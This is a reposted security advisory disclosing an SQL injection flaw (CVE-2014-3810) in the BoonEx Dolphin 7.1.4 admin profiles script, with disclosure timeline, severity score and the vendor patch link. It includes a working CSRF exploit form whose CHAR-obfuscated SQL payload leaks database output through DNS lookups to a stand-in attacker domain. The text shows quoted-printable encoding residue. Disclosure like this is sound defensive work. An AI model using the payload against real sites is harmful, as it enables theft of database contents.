SQL Injection in Dolphin

看板Bugtraq作者時間11年前 (2014/06/18 21:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串2/2 (看更多)
Advisory ID: HTB23216 Product: Dolphin Vendor: BoonEx Vulnerable Version(s): 7.1.4 and probably prior Tested Version: 7.1.4 Advisory Publication: May 21, 2014 [without technical details] Vendor Notification: May 21, 2014=20 Vendor Patch: June 17, 2014=20 Public Disclosure: June 18, 2014=20 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-3810 Risk Level: Medium=20 CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Solution Available Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered SQL injection vulnerabili= ty in Dolphin, which can be exploited to perform SQL injection attacks and = obtain sensitive information from the application database.=20 1) SQL Injection in Dolphin: CVE-2014-3810 The vulnerability exists due to insufficient sanitization of "members" HTTP= POST parameter passed to "/administration/profiles.php" script. A remote a= uthenticated administrator can send a specially crafted HTTP POST request t= o vulnerable script and execute arbitrary SQL commands in application=E2=80= =99s database.=20 This vulnerability could also be exploited by a remote non-authenticated at= tacker via CSRF vector, since the application is prone to Cross-Site Reques= t Forgery (CSRF) attacks. In order to do so an attacker should trick a logg= ed-in administrator to visit a web page with CSRF exploit. The CSRF exploit code below is based on DNS Exfiltration technique and may = be used if the database of the vulnerable application is hosted on a Window= s system. The exploit will send a DNS request demanding IP address for `ver= sion()` (or any other sensitive output from the database) subdomain of ".at= tacker.com" (a domain name, DNS server of which is controlled by the attack= er): <form action=3D"http://[host]/administration/profiles.php" method=3D"post" = name=3D"main"> <input type=3D"hidden" name=3D"adm-mp-members-ctl-type" value=3D"qlinks"> <input type=3D"hidden" name=3D"adm-mp-members-view-type" value=3D"simple"> <input type=3D"hidden" name=3D"order_by" value=3D""> <input type=3D"hidden" name=3D"per_page" value=3D"50"> <input type=3D"hidden" name=3D"members[]" value=3D"') AND 1=3D(select load_= file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116= ),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(9= 9),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR= (97),CHAR(114)))) -- "> <input type=3D"hidden" name=3D"adm-mp-activate" value=3D"Activate"> <input type=3D"submit" id=3D"btn"> </form> ---------------------------------------------------------------------------= -------------------- Solution: Apply vendor's instructions: http://www.boonex.com/forums/topic/Medium-Risk-Security-Vulnerability-in-Do= lphin-7-1.htm ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23216 - https://www.htbridge.com/advisory/= HTB23216 - SQL Injection in Dolphin. [2] Dolphin - http://www.boonex.com/dolphin - The world's most advanced sof= tware platform for building vibrant custom social networks and online commu= nities. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE SaaS - https://www.htbridge.com/immuniweb/ - hybrid of = manual web application penetration test and cutting-edge vulnerability scan= ner available online via a Software-as-a-Service (SaaS) model. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.
更多 advisory. 的文章
文章代碼(AID): #1JeOsEFf (Bugtraq)
更多 advisory. 的文章
文章代碼(AID): #1JeOsEFf (Bugtraq)